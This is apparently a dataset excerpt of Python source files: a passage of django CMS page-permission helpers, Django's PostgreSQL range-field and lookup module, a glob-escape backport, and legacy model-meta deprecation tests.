def user_can_view_page(user, page, site=None):
if site is None:
site = get_current_site()
if user.is_superuser:
return True
public_for = get_cms_setting('PUBLIC_FOR')
can_see_unrestricted = public_for == 'all' or (public_for == 'staff' and user.is_staff)
page = get_page_draft(page)
# inherited and direct view permissions
is_restricted = page.has_view_restrictions(site)
if not is_restricted and can_see_unrestricted:
# Page has no restrictions and project is configured
# to allow everyone to see unrestricted pages.
return True
elif not user.is_authenticated():
# Page has restrictions or project is configured
# to require staff user status to see pages.
return False
if user_can_view_all_pages(user, site=site):
return True
if not is_restricted:
# Page has no restrictions but user can't see unrestricted pages
return False
if user_can_change_page(user, page):
# If user has change permissions on a page
# then he can automatically view it.
return True
has_perm = has_generic_permission(
page=page,
user=user,
action='view_page',
check_global=False,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_view_page_draft(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_change_all_pages(user, site):
return has_global_permission(user, site, action='change_page')
@auth_permission_required('change_page')
def user_can_change_at_least_one_page(user, site, use_cache=True):
page_ids = get_change_id_list(
user=user,
site=site,
check_global=True,
use_cache=use_cache,
)
return page_ids == GRANT_ALL_PERMISSIONS or bool(page_ids)
@cached_func
def user_can_view_all_pages(user, site):
if user.is_superuser:
return True
if not get_cms_setting('PERMISSION'):
public_for = get_cms_setting('PUBLIC_FOR')
can_see_unrestricted = public_for == 'all' or (public_for == 'staff' and user.is_staff)
return can_see_unrestricted
if not user.is_authenticated():
return False
if user.has_perm(PAGE_VIEW_CODENAME):
# This is for backwards compatibility.
# The previous system allowed any user with the explicit view_page
# permission to see all pages.
return True
if user_can_change_all_pages(user, site):
# If a user can change all pages then he can see all pages.
return True
return has_global_permission(user, site, action='view_page')
def get_add_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has add page rights or the string
"All" if the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='add_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has edit rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_advanced_settings_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user can change advanced settings or the
string "All" if the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page_advanced_settings',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_change_permissions_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of page where the user can change permissions.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='change_page_permissions',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_delete_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has delete rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='delete_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_move_page_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of pages which user can move.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='move_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_publish_id_list(user, site, check_global=True, use_cache=True):
"""
Give a list of page where the user has publish rights or the string "All" if
the user has all rights.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='publish_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def get_view_id_list(user, site, check_global=True, use_cache=True):
"""Give a list of pages which user can view.
"""
page_ids = _get_page_ids_for_action(
user=user,
site=site,
action='view_page',
check_global=check_global,
use_cache=use_cache,
)
return page_ids
def has_generic_permission(page, user, action, site=None, check_global=True):
if site is None:
site = get_current_site()
if page.publisher_is_draft:
page_id = page.pk
else:
page_id = page.publisher_public_id
actions_map = {
'add_page': get_add_id_list,
'change_page': get_change_id_list,
'change_page_advanced_settings': get_change_advanced_settings_id_list,
'change_page_permissions': get_change_permissions_id_list,
'delete_page': get_delete_id_list,
'delete_page_translation': get_delete_id_list,
'move_page': get_move_page_id_list,
'publish_page': get_publish_id_list,
'view_page': get_view_id_list,
}
func = actions_map[action]
page_ids = func(user, site, check_global=check_global)
return page_ids == GRANT_ALL_PERMISSIONS or page_id in page_ids
```
|
{
"source": "jedie/django",
"score": 2
}
|
#### File: postgres/fields/ranges.py
```python
import json
from psycopg2.extras import DateRange, DateTimeTZRange, NumericRange, Range
from django.contrib.postgres import forms, lookups
from django.db import models
from django.utils import six
from .utils import AttributeSetter
__all__ = [
'RangeField', 'IntegerRangeField', 'BigIntegerRangeField',
'FloatRangeField', 'DateTimeRangeField', 'DateRangeField',
]
class RangeField(models.Field):
empty_strings_allowed = False
def get_prep_value(self, value):
if value is None:
return None
elif isinstance(value, Range):
return value
elif isinstance(value, (list, tuple)):
return self.range_type(value[0], value[1])
return value
def to_python(self, value):
if isinstance(value, six.string_types):
# Assume we're deserializing
vals = json.loads(value)
for end in ('lower', 'upper'):
if end in vals:
vals[end] = self.base_field.to_python(vals[end])
value = self.range_type(**vals)
elif isinstance(value, (list, tuple)):
value = self.range_type(value[0], value[1])
return value
def set_attributes_from_name(self, name):
super(RangeField, self).set_attributes_from_name(name)
self.base_field.set_attributes_from_name(name)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return None
if value.isempty:
return json.dumps({"empty": True})
base_field = self.base_field
result = {"bounds": value._bounds}
for end in ('lower', 'upper'):
obj = AttributeSetter(base_field.attname, getattr(value, end))
result[end] = base_field.value_to_string(obj)
return json.dumps(result)
def formfield(self, **kwargs):
kwargs.setdefault('form_class', self.form_field)
return super(RangeField, self).formfield(**kwargs)
class IntegerRangeField(RangeField):
base_field = models.IntegerField()
range_type = NumericRange
form_field = forms.IntegerRangeField
def db_type(self, connection):
return 'int4range'
class BigIntegerRangeField(RangeField):
base_field = models.BigIntegerField()
range_type = NumericRange
form_field = forms.IntegerRangeField
def db_type(self, connection):
return 'int8range'
class FloatRangeField(RangeField):
base_field = models.FloatField()
range_type = NumericRange
form_field = forms.FloatRangeField
def db_type(self, connection):
return 'numrange'
class DateTimeRangeField(RangeField):
base_field = models.DateTimeField()
range_type = DateTimeTZRange
form_field = forms.DateTimeRangeField
def db_type(self, connection):
return 'tstzrange'
class DateRangeField(RangeField):
base_field = models.DateField()
range_type = DateRange
form_field = forms.DateRangeField
def db_type(self, connection):
return 'daterange'
RangeField.register_lookup(lookups.DataContains)
RangeField.register_lookup(lookups.ContainedBy)
RangeField.register_lookup(lookups.Overlap)
class RangeContainedBy(models.Lookup):
lookup_name = 'contained_by'
type_mapping = {
'integer': 'int4range',
'bigint': 'int8range',
'double precision': 'numrange',
'date': 'daterange',
'timestamp with time zone': 'tstzrange',
}
def as_sql(self, qn, connection):
field = self.lhs.output_field
if isinstance(field, models.FloatField):
sql = '%s::numeric <@ %s::{}'.format(self.type_mapping[field.db_type(connection)])
else:
sql = '%s <@ %s::{}'.format(self.type_mapping[field.db_type(connection)])
lhs, lhs_params = self.process_lhs(qn, connection)
rhs, rhs_params = self.process_rhs(qn, connection)
params = lhs_params + rhs_params
return sql % (lhs, rhs), params
def get_prep_lookup(self):
return RangeField().get_prep_lookup(self.lookup_name, self.rhs)
models.DateField.register_lookup(RangeContainedBy)
models.DateTimeField.register_lookup(RangeContainedBy)
models.IntegerField.register_lookup(RangeContainedBy)
models.BigIntegerField.register_lookup(RangeContainedBy)
models.FloatField.register_lookup(RangeContainedBy)
@RangeField.register_lookup
class FullyLessThan(lookups.PostgresSimpleLookup):
lookup_name = 'fully_lt'
operator = '<<'
@RangeField.register_lookup
class FullGreaterThan(lookups.PostgresSimpleLookup):
lookup_name = 'fully_gt'
operator = '>>'
@RangeField.register_lookup
class NotLessThan(lookups.PostgresSimpleLookup):
lookup_name = 'not_lt'
operator = '&>'
@RangeField.register_lookup
class NotGreaterThan(lookups.PostgresSimpleLookup):
lookup_name = 'not_gt'
operator = '&<'
@RangeField.register_lookup
class AdjacentToLookup(lookups.PostgresSimpleLookup):
lookup_name = 'adjacent_to'
operator = '-|-'
@RangeField.register_lookup
class RangeStartsWith(lookups.FunctionTransform):
lookup_name = 'startswith'
function = 'lower'
@property
def output_field(self):
return self.lhs.output_field.base_field
@RangeField.register_lookup
class RangeEndsWith(lookups.FunctionTransform):
lookup_name = 'endswith'
function = 'upper'
@property
def output_field(self):
return self.lhs.output_field.base_field
@RangeField.register_lookup
class IsEmpty(lookups.FunctionTransform):
lookup_name = 'isempty'
function = 'isempty'
output_field = models.BooleanField()
```
#### File: django/utils/glob.py
```python
from __future__ import unicode_literals
import os.path
import re
from django.utils import six
# backport of Python 3.4's glob.escape
try:
from glob import escape as glob_escape
except ImportError:
_magic_check = re.compile('([*?[])')
if six.PY3:
_magic_check_bytes = re.compile(b'([*?[])')
def glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
if isinstance(pathname, bytes):
pathname = _magic_check_bytes.sub(br'[\1]', pathname)
else:
pathname = _magic_check.sub(r'[\1]', pathname)
return drive + pathname
else:
def glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r'[\1]', pathname)
return drive + pathname
```
#### File: tests/model_meta/test_legacy.py
```python
import warnings
from django import test
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import FieldDoesNotExist
from django.db.models.fields import CharField, related
from django.utils.deprecation import RemovedInDjango20Warning
from .models import BasePerson, Person
from .results import TEST_RESULTS
class OptionsBaseTests(test.SimpleTestCase):
def _map_related_query_names(self, res):
return tuple((o.field.related_query_name(), m) for o, m in res)
def _map_names(self, res):
return tuple((f.name, m) for f, m in res)
class M2MTests(OptionsBaseTests):
def test_many_to_many_with_model(self):
for model, expected_result in TEST_RESULTS['many_to_many_with_model'].items():
with warnings.catch_warnings(record=True) as warning:
warnings.simplefilter("always")
models = [model for field, model in model._meta.get_m2m_with_model()]
self.assertEqual([RemovedInDjango20Warning], [w.message.__class__ for w in warning])
self.assertEqual(models, expected_result)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class RelatedObjectsTests(OptionsBaseTests):
key_name = lambda self, r: r[0]
def test_related_objects(self):
result_key = 'get_all_related_objects_with_model_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model()
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_local(self):
result_key = 'get_all_related_objects_with_model_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(local_only=True)
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_include_hidden(self):
result_key = 'get_all_related_objects_with_model_hidden_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(include_hidden=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
def test_related_objects_include_hidden_local_only(self):
result_key = 'get_all_related_objects_with_model_hidden_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_hidden=True, local_only=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
def test_related_objects_proxy(self):
result_key = 'get_all_related_objects_with_model_proxy_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_proxy_eq=True)
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_objects_proxy_hidden(self):
result_key = 'get_all_related_objects_with_model_proxy_hidden_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_objects_with_model(
include_proxy_eq=True, include_hidden=True)
self.assertEqual(
sorted(self._map_names(objects), key=self.key_name),
sorted(expected, key=self.key_name)
)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class RelatedM2MTests(OptionsBaseTests):
def test_related_m2m_with_model(self):
result_key = 'get_all_related_many_to_many_with_model_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_m2m_objects_with_model()
self.assertEqual(self._map_related_query_names(objects), expected)
def test_related_m2m_local_only(self):
result_key = 'get_all_related_many_to_many_local_legacy'
for model, expected in TEST_RESULTS[result_key].items():
objects = model._meta.get_all_related_many_to_many_objects(local_only=True)
self.assertEqual([o.field.related_query_name() for o in objects], expected)
def test_related_m2m_asymmetrical(self):
m2m = Person._meta.many_to_many
self.assertTrue('following_base' in [f.attname for f in m2m])
related_m2m = Person._meta.get_all_related_many_to_many_objects()
self.assertTrue('followers_base' in [o.field.related_query_name() for o in related_m2m])
def test_related_m2m_symmetrical(self):
m2m = Person._meta.many_to_many
self.assertTrue('friends_base' in [f.attname for f in m2m])
related_m2m = Person._meta.get_all_related_many_to_many_objects()
self.assertIn('friends_inherited_rel_+', [o.field.related_query_name() for o in related_m2m])
@test.ignore_warnings(category=RemovedInDjango20Warning)
class GetFieldByNameTests(OptionsBaseTests):
def test_get_data_field(self):
field_info = Person._meta.get_field_by_name('data_abstract')
self.assertEqual(field_info[1:], (BasePerson, True, False))
self.assertIsInstance(field_info[0], CharField)
def test_get_m2m_field(self):
field_info = Person._meta.get_field_by_name('m2m_base')
self.assertEqual(field_info[1:], (BasePerson, True, True))
self.assertIsInstance(field_info[0], related.ManyToManyField)
def test_get_related_object(self):
field_info = Person._meta.get_field_by_name('relating_baseperson')
self.assertEqual(field_info[1:], (BasePerson, False, False))
self.assertTrue(field_info[0].auto_created)
def test_get_related_m2m(self):
field_info = Person._meta.get_field_by_name('relating_people')
self.assertEqual(field_info[1:], (None, False, True))
self.assertTrue(field_info[0].auto_created)
def test_get_generic_relation(self):
field_info = Person._meta.get_field_by_name('generic_relation_base')
self.assertEqual(field_info[1:], (None, True, False))
self.assertIsInstance(field_info[0], GenericRelation)
def test_get_m2m_field_invalid(self):
with warnings.catch_warnings(record=True) as warning:
warnings.simplefilter("always")
self.assertRaises(
FieldDoesNotExist,
Person._meta.get_field,
**{'field_name': 'm2m_base', 'many_to_many': False}
)
self.assertEqual(Person._meta.get_field('m2m_base', many_to_many=True).name, 'm2m_base')
# 2 RemovedInDjango20Warning messages should be raised, one for each call of get_field()
# with the 'many_to_many' argument.
self.assertEqual(
[RemovedInDjango20Warning, RemovedInDjango20Warning],
[w.message.__class__ for w in warning]
)
@test.ignore_warnings(category=RemovedInDjango20Warning)
class GetAllFieldNamesTestCase(OptionsBaseTests):
def test_get_all_field_names(self):
for model, expected_names in TEST_RESULTS['get_all_field_names'].items():
objects = model._meta.get_all_field_names()
self.assertEqual(sorted(map(str, objects)), sorted(expected_names))
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.